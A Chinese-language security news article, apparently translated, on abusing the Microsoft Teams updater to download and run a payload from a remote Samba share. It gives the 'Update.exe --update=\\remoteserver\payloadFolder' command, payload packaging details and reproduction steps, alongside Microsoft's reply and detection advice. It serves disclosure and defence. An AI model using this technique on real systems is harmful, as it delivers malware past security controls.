威胁参与者可以滥用Microsoft Teams更新程序来从远程位置检索和执行恶意代码。
Trustwave的安全专家详细介绍了“Living Off the Land”技术,该技术可能使威胁参与者滥用MS Teams Updater来从远程服务器下载任何二进制或恶意有效负载。
坏消息是,由于存在设计缺陷,因此无法轻松解决该问题。
先前提出的解决团队问题的解决方案包括限制其通过URL更新的能力。而是,更新程序允许通过共享或本地文件夹进行本地连接以进行产品更新。
“按照补丁程序,Microsoft Teams Updater将仅允许本地网络路径访问和更新,这意味着它将检测字符串“ http / s”,“:”,“ /”和更新程序URL中的端口号,阻止和将活动记录在%localappdata%\ Microsoft \ Teams \ SquirrelSetup.log下。” 读取Trustwave发布的分析。
该机制允许以本地UNC格式进行共享访问:\\ server \
如果满足以下条件,则攻击者可以利用它:
- 攻击者必须在打开的共享文件夹中将文件放到网络内部;
- 攻击者可以从该共享访问受害机器的有效负载;
专家注意到,这种攻击方案不容易实现。
为了简化攻击链,攻击者可以创建远程共享,而不是本地共享。这样,攻击者可以下载远程有效负载并执行它,而无需访问本地共享。
为了创建远程共享,专家们设置了一个允许远程公共访问的Samba服务器,他们能够使用以下命令从Microsoft Teams Updater“ Update.Exe”下载远程有效负载并运行它:
Update.exe --update=\\remoteserver\payloadFolderMicrosoft Teams利用开源项目Squirrel进行安装和更新例程。Squirrel依靠NuGet程序包管理器来创建必要的文件。
有效负载必须具有名称“ squirrel.exe”,并且必须放置在特定的nupkg文件中。必须使用伪造的Microsoft Teams版本的元数据来制作文件,并且安装位于AppData文件夹中,该文件夹不需要增加的访问权限。
Trustwave发布的帖子包括逐步进行攻击的步骤,以绕过应用程序中的当前缓解措施。
下面是重现攻击的步骤:
- 转到受害者系统上的目标应用程序文件夹“%localappdata%/ Microsoft / Teams /”
- 运行以下命令:
update.exe –update = [Samba服务器包含上述2个文件],
例如update.exe –update = \\ remoteserver \ payloadFolder
几秒钟后(等待10-15秒),有效负载将被成功下载并由Microsoft Teams执行。
Trustwave的研究人员Reegun Jayapaul试图向Microsoft报告此问题,并提供以下答复:
“再次感谢您将此问题提交给Microsoft。我们确定此行为是设计使然,因为“我们不能限制SMB源进行更新,因为我们的客户显然依赖于此(例如,文件夹重定向)”,Microsoft回答。
可能的缓解措施包括监视“ update.exe”命令行中的可疑连接以及检查“ squirrel.exe”的大小和哈希是否异常。
跟踪SMB连接(尤其是来自Microsoft Teams更新程序的连接)可以使我们检测到恶意活动。
*编译:Domino
*来自:securityaffairs